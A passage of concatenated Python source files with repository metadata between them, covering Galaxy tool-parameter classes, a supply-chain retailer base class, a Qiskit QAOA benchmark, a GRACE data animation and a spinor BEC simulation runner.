if self.datatypes_registry:
conv_type = self.datatypes_registry.get_datatype_by_extension(conv_extension.lower())
if conv_type is None:
raise ParameterValueError(f"datatype class not found for extension '{conv_type}', which is used as 'type' attribute in conversion of data parameter", self.name)
self.conversions.append((name, conv_extension, [conv_type]))
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
if trans.workflow_building_mode is workflow_building_modes.ENABLED or is_runtime_value(value):
return None
if not value and not self.optional:
raise ParameterValueError("specify a dataset of the required format / build for parameter", self.name)
if value in [None, "None", '']:
return None
if isinstance(value, dict) and 'values' in value:
value = self.to_python(value, trans.app)
if isinstance(value, str) and value.find(",") > 0:
value = [int(value_part) for value_part in value.split(",")]
if isinstance(value, list):
rval = []
found_hdca = False
for single_value in value:
if isinstance(single_value, dict) and 'src' in single_value and 'id' in single_value:
if single_value['src'] == 'hda':
decoded_id = trans.security.decode_id(single_value['id'])
rval.append(trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(decoded_id))
elif single_value['src'] == 'hdca':
found_hdca = True
decoded_id = trans.security.decode_id(single_value['id'])
rval.append(trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(decoded_id))
elif single_value['src'] == 'ldda':
decoded_id = trans.security.decode_id(single_value['id'])
rval.append(trans.sa_session.query(trans.app.model.LibraryDatasetDatasetAssociation).get(decoded_id))
else:
raise ValueError(f"Unknown input source {single_value['src']} passed to job submission API.")
elif isinstance(single_value, trans.app.model.HistoryDatasetCollectionAssociation):
rval.append(single_value)
elif isinstance(single_value, trans.app.model.DatasetCollectionElement):
rval.append(single_value)
elif isinstance(single_value, trans.app.model.HistoryDatasetAssociation):
rval.append(single_value)
elif isinstance(single_value, trans.app.model.LibraryDatasetDatasetAssociation):
rval.append(single_value)
else:
if len(str(single_value)) == 16:
# Could never really have an ID this big anyway - postgres doesn't
# support that for integer column types.
log.warning("Encoded ID where unencoded ID expected.")
single_value = trans.security.decode_id(single_value)
rval.append(trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(single_value))
if found_hdca:
for val in rval:
if not isinstance(val, trans.app.model.HistoryDatasetCollectionAssociation):
raise ParameterValueError("if collections are supplied to multiple data input parameter, only collections may be used", self.name)
elif isinstance(value, trans.app.model.HistoryDatasetAssociation):
rval = value
elif isinstance(value, dict) and 'src' in value and 'id' in value:
if value['src'] == 'hda':
decoded_id = trans.security.decode_id(value['id'])
rval = trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(decoded_id)
elif value['src'] == 'hdca':
decoded_id = trans.security.decode_id(value['id'])
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(decoded_id)
else:
raise ValueError(f"Unknown input source {value['src']} passed to job submission API.")
elif str(value).startswith("__collection_reduce__|"):
encoded_ids = [v[len("__collection_reduce__|"):] for v in str(value).split(",")]
decoded_ids = map(trans.security.decode_id, encoded_ids)
rval = []
for decoded_id in decoded_ids:
hdca = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(decoded_id)
rval.append(hdca)
elif isinstance(value, trans.app.model.HistoryDatasetCollectionAssociation) or isinstance(value, trans.app.model.DatasetCollectionElement):
rval = value
else:
rval = trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(value)
values = util.listify(rval)
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
for v in values:
if v:
if hasattr(v, "deleted") and v.deleted:
raise ParameterValueError("the previously selected dataset has been deleted.", self.name)
elif hasattr(v, "dataset") and v.dataset.state in [galaxy.model.Dataset.states.ERROR, galaxy.model.Dataset.states.DISCARDED]:
raise ParameterValueError("the previously selected dataset has entered an unusable state", self.name)
elif hasattr(v, "dataset"):
match = dataset_matcher.hda_match(v)
if match and match.implicit_conversion:
v.implicit_conversion = True
if not self.multiple:
if len(values) > 1:
raise ParameterValueError("more than one dataset supplied to single input dataset parameter", self.name)
if len(values) > 0:
rval = values[0]
else:
raise ParameterValueError("invalid dataset supplied to single input dataset parameter", self.name)
return rval
def to_param_dict_string(self, value, other_values=None):
if value is None:
return "None"
return value.file_name
def to_text(self, value):
if value and not isinstance(value, list):
value = [value]
if value:
try:
return ", ".join(f"{item.hid}: {item.name}" for item in value)
except Exception:
pass
return "No dataset."
def get_dependencies(self):
"""
Get the *names* of the other params this param depends on.
"""
if self.options:
return self.options.get_dependency_names()
else:
return []
def converter_safe(self, other_values, trans):
if self.tool is None or self.tool.has_multiple_pages or not hasattr(trans, 'workflow_building_mode') or trans.workflow_building_mode:
return False
if other_values is None:
return True # we don't know other values, so we can't check, assume ok
converter_safe = [True]
def visitor(prefix, input, value, parent=None):
if isinstance(input, SelectToolParameter) and self.name in input.get_dependencies():
if input.is_dynamic and (input.dynamic_options or (not input.dynamic_options and not input.options) or not input.options.converter_safe):
converter_safe[0] = False # This option does not allow for conversion, i.e. uses contents of dataset file to generate options
self.tool.visit_inputs(other_values, visitor)
return False not in converter_safe
def get_options_filter_attribute(self, value):
# HACK to get around current hardcoded limitation of when a set of dynamic options is defined for a DataToolParameter
# it always causes available datasets to be filtered by dbkey
# this behavior needs to be entirely reworked (in a backwards compatible manner)
options_filter_attribute = self.options_filter_attribute
if options_filter_attribute is None:
return value.get_dbkey()
if options_filter_attribute.endswith("()"):
call_attribute = True
options_filter_attribute = options_filter_attribute[:-2]
else:
call_attribute = False
ref = value
for attribute in options_filter_attribute.split('.'):
ref = getattr(ref, attribute)
if call_attribute:
ref = ref()
return str(ref)
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
# create dictionary and fill default parameters
d = super().to_dict(trans)
extensions = self.extensions
all_edam_formats = self.datatypes_registry.edam_formats if hasattr(self.datatypes_registry, 'edam_formats') else {}
all_edam_data = self.datatypes_registry.edam_data if hasattr(self.datatypes_registry, 'edam_formats') else {}
edam_formats = [all_edam_formats.get(ext, None) for ext in extensions]
edam_data = [all_edam_data.get(ext, None) for ext in extensions]
d['extensions'] = extensions
d['edam'] = {'edam_formats': edam_formats, 'edam_data': edam_data}
d['multiple'] = self.multiple
if self.multiple:
# For consistency, should these just always be in the dict?
d['min'] = self.min
d['max'] = self.max
d['options'] = {'hda': [], 'hdca': []}
# return dictionary without options if context is unavailable
history = trans.history
if history is None or trans.workflow_building_mode is workflow_building_modes.ENABLED:
return d
# prepare dataset/collection matching
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
multiple = self.multiple
# build and append a new select option
def append(list, hda, name, src, keep=False, subcollection_type=None):
value = {
'id': trans.security.encode_id(hda.id),
'hid': hda.hid if hda.hid is not None else -1,
'name': name,
'tags': [t.user_tname if not t.value else f"{t.user_tname}:{t.value}" for t in hda.tags],
'src': src,
'keep': keep
}
if subcollection_type:
value["map_over_type"] = subcollection_type
return list.append(value)
# add datasets
hda_list = util.listify(other_values.get(self.name))
# Prefetch all at once, big list of visible, non-deleted datasets.
for hda in history.active_visible_datasets_and_roles:
match = dataset_matcher.hda_match(hda)
if match:
m = match.hda
hda_list = [h for h in hda_list if h != m and h != hda]
m_name = f'{match.original_hda.name} (as {match.target_ext})' if match.implicit_conversion else m.name
append(d['options']['hda'], m, m_name, 'hda')
for hda in hda_list:
if hasattr(hda, 'hid'):
if hda.deleted:
hda_state = 'deleted'
elif not hda.visible:
hda_state = 'hidden'
else:
hda_state = 'unavailable'
append(d['options']['hda'], hda, f'({hda_state}) {hda.name}', 'hda', True)
# add dataset collections
dataset_collection_matcher = dataset_matcher_factory.dataset_collection_matcher(dataset_matcher)
for hdca in history.active_visible_dataset_collections:
match = dataset_collection_matcher.hdca_match(hdca)
if match:
subcollection_type = None
if multiple and hdca.collection.collection_type != 'list':
collection_type_description = self._history_query(trans).can_map_over(hdca)
if collection_type_description:
subcollection_type = collection_type_description.collection_type
else:
continue
name = hdca.name
if match.implicit_conversion:
name = f"{name} (with implicit datatype conversion)"
append(d['options']['hdca'], hdca, name, 'hdca', subcollection_type=subcollection_type)
continue
# sort both lists
d['options']['hda'] = sorted(d['options']['hda'], key=lambda k: k['hid'], reverse=True)
d['options']['hdca'] = sorted(d['options']['hdca'], key=lambda k: k['hid'], reverse=True)
# return final dictionary
return d
def _history_query(self, trans):
assert self.multiple
dataset_collection_type_descriptions = trans.app.dataset_collection_manager.collection_type_descriptions
# If multiple data parameter, treat like a list parameter.
return history_query.HistoryQuery.from_collection_type("list", dataset_collection_type_descriptions)
class DataCollectionToolParameter(BaseDataToolParameter):
"""
"""
def __init__(self, tool, input_source, trans=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source, trans)
self._parse_formats(trans, input_source)
collection_types = input_source.get("collection_type", None)
if collection_types:
collection_types = [t.strip() for t in collection_types.split(",")]
self._collection_types = collection_types
self.multiple = False # Accessed on DataToolParameter a lot, may want in future
self.is_dynamic = True
self._parse_options(input_source) # TODO: Review and test.
@property
def collection_types(self):
return self._collection_types
def _history_query(self, trans):
dataset_collection_type_descriptions = trans.app.dataset_collection_manager.collection_type_descriptions
return history_query.HistoryQuery.from_parameter(self, dataset_collection_type_descriptions)
def match_collections(self, trans, history, dataset_collection_matcher):
dataset_collections = trans.app.dataset_collection_manager.history_dataset_collections(history, self._history_query(trans))
for dataset_collection_instance in dataset_collections:
match = dataset_collection_matcher.hdca_match(dataset_collection_instance)
if not match:
continue
yield dataset_collection_instance, match.implicit_conversion
def match_multirun_collections(self, trans, history, dataset_collection_matcher):
for history_dataset_collection in history.active_visible_dataset_collections:
if not self._history_query(trans).can_map_over(history_dataset_collection):
continue
match = dataset_collection_matcher.hdca_match(history_dataset_collection)
if match:
yield history_dataset_collection, match.implicit_conversion
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
rval = None
if trans.workflow_building_mode is workflow_building_modes.ENABLED:
return None
if not value and not self.optional:
raise ParameterValueError("specify a dataset collection of the correct type", self.name)
if value in [None, "None"]:
return None
if isinstance(value, dict) and 'values' in value:
value = self.to_python(value, trans.app)
if isinstance(value, str) and value.find(",") > 0:
value = [int(value_part) for value_part in value.split(",")]
elif isinstance(value, trans.app.model.HistoryDatasetCollectionAssociation):
rval = value
elif isinstance(value, trans.app.model.DatasetCollectionElement):
# When mapping over nested collection - this paramter will recieve
# a DatasetCollectionElement instead of a
# HistoryDatasetCollectionAssociation.
rval = value
elif isinstance(value, dict) and 'src' in value and 'id' in value:
if value['src'] == 'hdca':
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(trans.security.decode_id(value['id']))
elif isinstance(value, list):
if len(value) > 0:
value = value[0]
if isinstance(value, dict) and 'src' in value and 'id' in value:
if value['src'] == 'hdca':
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(trans.security.decode_id(value['id']))
elif value['src'] == 'dce':
rval = trans.sa_session.query(trans.app.model.DatasetCollectionElement).get(trans.security.decode_id(value['id']))
elif isinstance(value, str):
if value.startswith("dce:"):
rval = trans.sa_session.query(trans.app.model.DatasetCollectionElement).get(value[len("dce:"):])
elif value.startswith("hdca:"):
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(value[len("hdca:"):])
else:
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(value)
if rval and isinstance(rval, trans.app.model.HistoryDatasetCollectionAssociation):
if rval.deleted:
raise ParameterValueError("the previously selected dataset collection has been deleted", self.name)
# TODO: Handle error states, implement error states ...
return rval
def to_text(self, value):
try:
if isinstance(value, galaxy.model.HistoryDatasetCollectionAssociation):
display_text = f"{value.hid}: {value.name}"
else:
display_text = "Element %d:%s" % (value.identifier_index, value.identifier_name)
except AttributeError:
display_text = "No dataset collection."
return display_text
def to_dict(self, trans, other_values=None):
# create dictionary and fill default parameters
other_values = other_values or {}
d = super().to_dict(trans)
d['extensions'] = self.extensions
d['multiple'] = self.multiple
d['options'] = {'hda': [], 'hdca': [], 'dce': []}
# return dictionary without options if context is unavailable
history = trans.history
if history is None or trans.workflow_building_mode is workflow_building_modes.ENABLED:
return d
# prepare dataset/collection matching
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
dataset_collection_matcher = dataset_matcher_factory.dataset_collection_matcher(dataset_matcher)
# append DCE
if isinstance(other_values.get(self.name), galaxy.model.DatasetCollectionElement):
dce = other_values[self.name]
d['options']['dce'].append({
'id': trans.security.encode_id(dce.id),
'hid': None,
'name': dce.element_identifier,
'src': 'dce',
'tags': []
})
# append directly matched collections
for hdca, implicit_conversion in self.match_collections(trans, history, dataset_collection_matcher):
name = hdca.name
if implicit_conversion:
name = f"{name} (with implicit datatype conversion)"
d['options']['hdca'].append({
'id': trans.security.encode_id(hdca.id),
'hid': hdca.hid,
'name': name,
'src': 'hdca',
'tags': [t.user_tname if not t.value else f"{t.user_tname}:{t.value}" for t in hdca.tags]
})
# append matching subcollections
for hdca, implicit_conversion in self.match_multirun_collections(trans, history, dataset_collection_matcher):
subcollection_type = self._history_query(trans).can_map_over(hdca).collection_type
name = hdca.name
if implicit_conversion:
name = f"{name} (with implicit datatype conversion)"
d['options']['hdca'].append({
'id': trans.security.encode_id(hdca.id),
'hid': hdca.hid,
'name': name,
'src': 'hdca',
'tags': [t.user_tname if not t.value else f"{t.user_tname}:{t.value}" for t in hdca.tags],
'map_over_type': subcollection_type
})
# sort both lists
d['options']['hdca'] = sorted(d['options']['hdca'], key=lambda k: k['hid'], reverse=True)
# return final dictionary
return d
class HiddenDataToolParameter(HiddenToolParameter, DataToolParameter):
"""
Hidden parameter that behaves as a DataToolParameter. As with all hidden
parameters, this is a HACK.
"""
def __init__(self, tool, elem):
DataToolParameter.__init__(self, tool, elem)
self.value = "None"
self.type = "hidden_data"
self.hidden = True
class LibraryDatasetToolParameter(ToolParameter):
"""
Parameter that lets users select a LDDA from a modal window, then use it within the wrapper.
"""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.multiple = input_source.get_bool('multiple', True)
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
return self.to_python(value, trans.app, other_values=other_values, validate=True)
def to_param_dict_string(self, value, other_values=None):
if value is None:
return 'None'
elif self.multiple:
return [dataset.get_file_name() for dataset in value]
else:
return value[0].get_file_name()
# converts values to json representation:
# { id: LibraryDatasetDatasetAssociation.id, name: LibraryDatasetDatasetAssociation.name, src: 'lda' }
def to_json(self, value, app, use_security):
if not isinstance(value, list):
value = [value]
lst = []
for item in value:
lda_id = lda_name = None
if isinstance(item, app.model.LibraryDatasetDatasetAssociation):
lda_id = app.security.encode_id(item.id) if use_security else item.id
lda_name = item.name
elif isinstance(item, dict):
lda_id = item.get('id')
lda_name = item.get('name')
else:
lst = []
break
if lda_id is not None:
lst.append({
'id': lda_id,
'name': lda_name,
'src': 'ldda'
})
if len(lst) == 0:
return None
else:
return lst
# converts values into python representation:
# LibraryDatasetDatasetAssociation
# valid input values (incl. arrays of mixed sets) are:
# 1. LibraryDatasetDatasetAssociation
# 2. LibraryDatasetDatasetAssociation.id
# 3. { id: LibraryDatasetDatasetAssociation.id, ... }
def to_python(self, value, app, other_values=None, validate=False):
other_values = other_values or {}
if not isinstance(value, list):
value = [value]
lst = []
for item in value:
if isinstance(item, app.model.LibraryDatasetDatasetAssociation):
lst.append(item)
else:
lda_id = None
if isinstance(item, dict):
lda_id = item.get('id')
elif isinstance(item, str):
lda_id = item
else:
lst = []
break
lda = app.model.context.query(app.model.LibraryDatasetDatasetAssociation).get(lda_id if isinstance(lda_id, int) else app.security.decode_id(lda_id))
if lda is not None:
lst.append(lda)
elif validate:
raise ParameterValueError("one of the selected library datasets is invalid or not available anymore", self.name)
if len(lst) == 0:
if not self.optional and validate:
raise ParameterValueError("invalid library dataset selected", self.name)
return None
else:
return lst
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
d['multiple'] = self.multiple
return d
class BaseJsonToolParameter(ToolParameter):
"""
Class of parameter that tries to keep values as close to JSON as possible.
In particular value_to_basic is overloaded to prevent params_to_strings from
double encoding JSON and to_python using loads to produce values.
"""
def value_to_basic(self, value, app, use_security=False):
if is_runtime_value(value):
return runtime_to_json(value)
return value
def to_json(self, value, app, use_security):
"""Convert a value to a string representation suitable for persisting"""
return json.dumps(value)
def to_python(self, value, app):
"""Convert a value created with to_json back to an object representation"""
return json.loads(value)
class DirectoryUriToolParameter(SimpleTextToolParameter):
"""galaxy.files URIs for directories."""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
SimpleTextToolParameter.__init__(self, tool, input_source)
class RulesListToolParameter(BaseJsonToolParameter):
"""
Parameter that allows for the creation of a list of rules using the Galaxy rules DSL.
"""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
BaseJsonToolParameter.__init__(self, tool, input_source)
self.data_ref = input_source.get("data_ref", None)
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = ToolParameter.to_dict(self, trans)
target_name = self.data_ref
if target_name in other_values:
target = other_values[target_name]
if not is_runtime_value(target):
d["target"] = {
"src": "hdca" if hasattr(target, "collection") else "hda",
"id": trans.app.security.encode_id(target.id),
}
return d
def validate(self, value, trans=None):
super().validate(value, trans=trans)
if not isinstance(value, dict):
raise ValueError("No rules specified for rules parameter.")
if "rules" not in value:
raise ValueError("No rules specified for rules parameter")
mappings = value.get("mapping", None)
if not mappings:
raise ValueError("No column definitions defined for rules parameter.")
def to_text(self, value):
if value:
rule_set = RuleSet(value)
return rule_set.display
else:
return ""
parameter_types = dict(
text=TextToolParameter,
integer=IntegerToolParameter,
float=FloatToolParameter,
boolean=BooleanToolParameter,
genomebuild=GenomeBuildParameter,
select=SelectToolParameter,
color=ColorToolParameter,
group_tag=SelectTagParameter,
data_column=ColumnListParameter,
hidden=HiddenToolParameter,
hidden_data=HiddenDataToolParameter,
baseurl=BaseURLToolParameter,
file=FileToolParameter,
ftpfile=FTPFileToolParameter,
data=DataToolParameter,
data_collection=DataCollectionToolParameter,
library_data=LibraryDatasetToolParameter,
rules=RulesListToolParameter,
directory_uri=DirectoryUriToolParameter,
drill_down=DrillDownSelectToolParameter
)
def runtime_to_json(runtime_value):
if isinstance(runtime_value, ConnectedValue) or (isinstance(runtime_value, dict) and runtime_value["__class__"] == "ConnectedValue"):
return {"__class__": "ConnectedValue"}
else:
return {"__class__": "RuntimeValue"}
def runtime_to_object(runtime_value):
if isinstance(runtime_value, ConnectedValue) or (isinstance(runtime_value, dict) and runtime_value["__class__"] == "ConnectedValue"):
return ConnectedValue()
else:
return RuntimeValue()
class RuntimeValue:
"""
Wrapper to note a value that is not yet set, but will be required at runtime.
"""
class ConnectedValue(RuntimeValue):
"""
Wrapper to note a value that is not yet set, but will be inferred from a connection.
"""
| 44.323741
| 395
| 0.615394
|
d85bbe9c8d40d8069c1ab882b9b2bbd0d971ca36
| 1,516
|
py
|
Python
|
scregmin/retailer/base.py
|
IBM/supply-chain-regret-minimization
|
2f08612e0e7d91a3b890cc5e4f4ee6f2df36fe97
|
[
"Apache-2.0"
] | 1
|
2021-09-23T10:14:37.000Z
|
2021-09-23T10:14:37.000Z
|
scregmin/retailer/base.py
|
IBM/supply-chain-regret-minimization
|
2f08612e0e7d91a3b890cc5e4f4ee6f2df36fe97
|
[
"Apache-2.0"
] | null | null | null |
scregmin/retailer/base.py
|
IBM/supply-chain-regret-minimization
|
2f08612e0e7d91a3b890cc5e4f4ee6f2df36fe97
|
[
"Apache-2.0"
] | 1
|
2022-02-16T17:58:49.000Z
|
2022-02-16T17:58:49.000Z
|
#
# Copyright 2020- IBM Inc. All rights reserved
# SPDX-License-Identifier: Apache2.0
#
from typing import Tuple, Optional, Dict, Union
import numpy as np
from collections import defaultdict
from abc import ABC, abstractmethod
class BaseRetailer(ABC):
def __init__(self, seed: Optional[int] = None):
if seed is None:
seed = sum([ord(s) for s in "retailer"])
self.seed = seed
self.reset_rng()
def reset_rng(self, seed: Optional[int] = None):
if seed is None:
self.rng = np.random.RandomState(self.seed)
else:
self.rng = np.random.RandomState(seed)
@abstractmethod
def act(self, wholesale_price: float) -> Tuple[float, float]:
raise NotImplementedError
@abstractmethod
def learn(self, demand: float):
raise NotImplementedError
class RandomRetailer(BaseRetailer):
def act(self, wholesale_price: float) -> Tuple[float, float]:
retail_price, quantity = self.rng.random(2)
return retail_price, quantity
def learn(self, demand: float):
pass
class ConstantRetailer(BaseRetailer):
def __init__(self,
retail_price: float,
quantity: float,
seed: Optional[int] = None):
self.retail_price = retail_price
self.quantity = quantity
def act(self, wholesale_price: float) -> Tuple[float, float]:
return self.retail_price, self.quantity
def learn(self, demand: float):
pass
| 24.852459
| 65
| 0.639182
|
3d9ba78eba20c481aaccce0f67f932ba987e72ad
| 2,471
|
py
|
Python
|
data/p4VQE/R1/benchmark/startQiskit_Class174.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R1/benchmark/startQiskit_Class174.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R1/benchmark/startQiskit_Class174.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=12
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.cx(input_qubit[1],input_qubit[0]) # number=9
prog.x(input_qubit[0]) # number=10
prog.cx(input_qubit[1],input_qubit[0]) # number=11
prog.x(input_qubit[0]) # number=6
prog.y(input_qubit[2]) # number=7
prog.y(input_qubit[2]) # number=8
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5200
writefile = open("../data/startQiskit_Class174.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog, FakeYorktown())
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 27.455556
| 118
| 0.634156
|
f58c129056a76d53deabe73b877cc2532ca0c924
| 886
|
py
|
Python
|
Code/animate.py
|
AndreasMadsen/grace
|
bf472d30a2fac76145d3f68e819c92da4a1970ba
|
[
"MIT"
] | 1
|
2016-05-17T22:52:19.000Z
|
2016-05-17T22:52:19.000Z
|
Code/animate.py
|
AndreasMadsen/grace
|
bf472d30a2fac76145d3f68e819c92da4a1970ba
|
[
"MIT"
] | null | null | null |
Code/animate.py
|
AndreasMadsen/grace
|
bf472d30a2fac76145d3f68e819c92da4a1970ba
|
[
"MIT"
] | null | null | null |
import grace
import math
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.basemap as maps
import matplotlib.animation as animation
fig = plt.figure(figsize=(12, 6))
m = maps.Basemap(projection='cyl', lon_0=0, resolution='c')
m.drawcoastlines(linewidth=.5)
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0])
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1])
print math.ceil(np.max(grace.grids)), math.floor(np.min(grace.grids))
im = m.imshow(grace.grids[::-1,:,0], vmax=math.ceil(np.max(grace.grids)), vmin=math.floor(np.min(grace.grids)))
im.set_cmap('binary_r')
print grace.grids[::-1,:,:].shape
def updatefig(period):
im.set_data(grace.grids[::-1,:,period])
plt.title(str(grace.dates[period, 0]))
ani = animation.FuncAnimation(fig, updatefig, frames=grace.grids.shape[2], interval=20, blit=False, repeat=False)
m.colorbar()
plt.show()
| 27.6875
| 113
| 0.723476
|
baa430bccc5fe73199ceed34047fa6bd35b984a6
| 15,296
|
py
|
Python
|
SimulationRunner.py
|
ZachGlassman/SpinorBECSimulation
|
8821a8bc150eda2aa36ce6b39ff178a3ddc99df1
|
[
"MIT"
] | null | null | null |
SimulationRunner.py
|
ZachGlassman/SpinorBECSimulation
|
8821a8bc150eda2aa36ce6b39ff178a3ddc99df1
|
[
"MIT"
] | null | null | null |
SimulationRunner.py
|
ZachGlassman/SpinorBECSimulation
|
8821a8bc150eda2aa36ce6b39ff178a3ddc99df1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Simulation Runner - This is a module containing a unified interface
into the 3 simulation types written. It should be the primary way to interact
with the simulation codes. It will allow easy comparison of results.
Three types of codes and requirements
Mean Field:
Number of atoms
number of samples (truncated wigner)
c
tfinal (simulation time)
pulses
qu0 (optional)
magnetic field
Fock State Full Quantum:
Number of atoms
c
mag_time(for magnetic field) not currently implemented
tauB(magnetic field decay) not currently implemented
dt (timestep)
magnetic field
Coherent State full Quantum:
Number of Atoms
magnetic field
magnetization
magnetic_field range loop
atom_range loop
spinor_phase
n_0
c (list)
delta_t (list)
ndiv (list)
emw (list)
n_step (list)
It will provide a unified plotting interface and variable interface
@author: Zachary Glassman
"""
# uncomment if using only terminal access
#import matplotlib
# matplotlib.use('Agg')
import os
import time as time_mod
import configparser
import argparse
from numpy.lib import scimath
import numpy as np
import matplotlib.pyplot as plt
from SpinorBECSimulation.MeanField.MeanFieldSimulation import single_simulation as mean_sim
from SpinorBECSimulation.FullQuantumFock.FockStateSimulation import fock_sim
from SpinorBECSimulation.CoherentStateChebyshev.spinorf import solve_system as cheby_sim_s
from SpinorBECSimulation.CoherentStateChebyshev.spinorf_multicore import solve_system as cheby_sim_p
try:
import colorama
except ImportError:
pass
#parallel or serial
#cheby_sim = cheby_sim_p
cheby_sim = cheby_sim_s
def color_text(text, color):
"""Function color text
:param data: text to color
:type data: string
:param color: color
:type color: string
"""
try:
return getattr(colorama.Fore, color) + text + colorama.Style.RESET_ALL
except:
return text
class SimulationResult(object):
"""class to hold results so we can parse different simulation into
equivalent results"""
def __init__(self, time, rho_0, std, color, name, init_norm=None):
self.t = time
self.rho = rho_0
self.std = std
self.name = name
self.col = color
self.q = False
self.init_norm = init_norm
self.plot_label =os.path.basename(self.name)
def plot(self, ax):
"""plot given axis ax"""
ax.fill_between(self.t, self.rho - self.std, self.rho +
self.std, color=self.col, alpha=.2)
ax.plot(self.t, self.rho, label=self.name, color=self.col)
def plot_ryan(self, ax):
ax.plot(self.t, self.rho, label=self.plot_label, color=self.col)
ax.plot(self.t, self.std, label=self.plot_label +
'std', color=self.col, linestyle='--')
def plot_no_color(self, ax, col):
ax.plot(self.t, self.rho, label=self.plot_label, color=col)
ax.plot(self.t, self.std, label=self.plot_label +
'std', color=col, linestyle='--')
def save(self, name):
"""function to save results to file"""
filename = '{0}_{1}_results.txt'.format(self.name, name)
try:
with open(filename, 'w') as f:
f.write('{0:10}{1:10}{2:10}{3:10}\n'.format(
'Time', 'Mean', 'STD', 'NORM'))
for i, time in enumerate(self.t):
f.write('{:<20.8f}{:<20.8f}{:<20.8f}{:<20.8f}\n'.format(
time, self.rho[i], self.std[i], self.init_norm[i]))
except:
with open(filename, 'w') as f:
f.write('{0:10}{1:10}{2:10}\n'.format('Time', 'Mean', 'STD'))
for i, time in enumerate(self.t):
f.write('{:<20.8f}{:<20.8f}{:<20.8f}\n'.format(
time, self.rho[i], self.std[i]))
def print_information(self):
print(self.t)
print(self.rho)
def q_to_b(q):
return scimath.sqrt(q / 277 * (2 * np.pi)**3) / (2 * np.pi)
class Simulation(object):
"""Simulation Class is a simulation for a certain set of parameters
Will automatically use correct factors to compare to real vales"""
def __init__(self, name, savepath, pulses=[], number=False):
"""Inititalize name and all possible parameters set to reasonable values"""
self.name = name
self.savepath = savepath
self.params = {
'n': 5000,
'c': 24,
'n_samps': 200,
'magnetic_field': 27,
'atom_range': 20,
'mag_range': 20,
'spinor_phase': 0,
'n0': 4998,
'n1': 0,
'nm1': 0,
'time_step': 0.001e-3,
'tauB': 1e-3,
'total_time': .01,
'mag_time': 0.015,
'mag': 0,
}
self.pulses = pulses
self.number = number
self.fock = False
self.mean = False
self.cheby = False
self.verbose = False
def transform_q(self):
self.params['magnetic_field'] = q_to_b(self.params['q'])
def run_fock(self):
"""run a fock simulation with the current parameters"""
if self.verbose:
